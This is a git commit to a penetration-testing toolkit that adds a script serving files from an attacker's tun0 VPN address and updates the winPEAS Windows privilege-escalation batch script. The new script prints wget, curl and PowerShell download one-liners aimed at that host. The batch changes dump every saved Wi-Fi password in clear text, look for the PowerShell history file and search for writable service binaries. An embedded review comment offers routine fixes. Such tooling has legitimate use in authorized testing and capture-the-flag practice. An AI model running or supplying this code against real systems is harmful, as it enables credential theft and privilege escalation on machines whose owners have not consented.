winPEAS update

This commit is contained in:
Roman Hergenreder 2020-10-01 22:39:39 +02:00
parent ffddd34e06
commit eb9e62b70f
2 changed files with 13 additions and 3 deletions

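--- /dev/null
+++ b/startHttpServer.sh
@@ -0,0 +1,9 @@
+#!/usr/bin/bash
+ipAddress=$(ip a show dev tun0 | grep inet | awk '{print $2'} | cut -d'/' -f1 | head -n 1)
+echo "wget http://${ipAddress}/"
+echo "curl http://${ipAddress}/"
+echo "(New-Object System.Net.WebClient).DownloadFile('http://${ipAddress}/', 'C:\\Temp\\')"
+echo ""
+sudo python -m http.server 80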
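Review bot: `ipAddress` on line 2 is never checked, so when tun0 is absent or has no address the script prints `http:///` helpers and still starts a root-privileged `http.server`; add `[[ -n "$ipAddress" ]] || { echo 'tun0 has no address' >&2; exit 1; }` after the assignment and `set -euo pipefail` under the shebang. The same line's `awk '{print $2'}` only works because the stray `}` is concatenated onto the quoted string — write `awk '{print $2}'`, and use `grep -w inet` (or `ip -4 a`) so an `inet6` line can never be the first match. The final `sudo python -m http.server 80` serves the shell's current working directory, recursively, to anyone who can reach the interface; a comment such as `# serves $PWD as root — run only from a directory that holds the files to hand out` above it would make that explicit.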

@ -165,6 +165,8 @@ echo.
echo PS default transcript history echo PS default transcript history
dir %SystemDrive%\transcripts\ dir %SystemDrive%\transcripts\
echo. echo.
echo Checking PS history file
dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
echo. echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Maybe you find something interesting echo [i] Maybe you find something interesting
@ -278,8 +280,7 @@ ipconfig /displaydns | findstr "Record" | findstr "Name Host"
echo. echo.
echo. echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] To get the clear-text password use: netsh wlan show profile <SSID> key=clear for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.)
netsh wlan show profile
echo. echo.
echo. echo.
echo. echo.
@ -359,7 +360,7 @@ echo [i] The permissions are also checked and filtered using icacls
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. echo %%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
) )
) )
::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """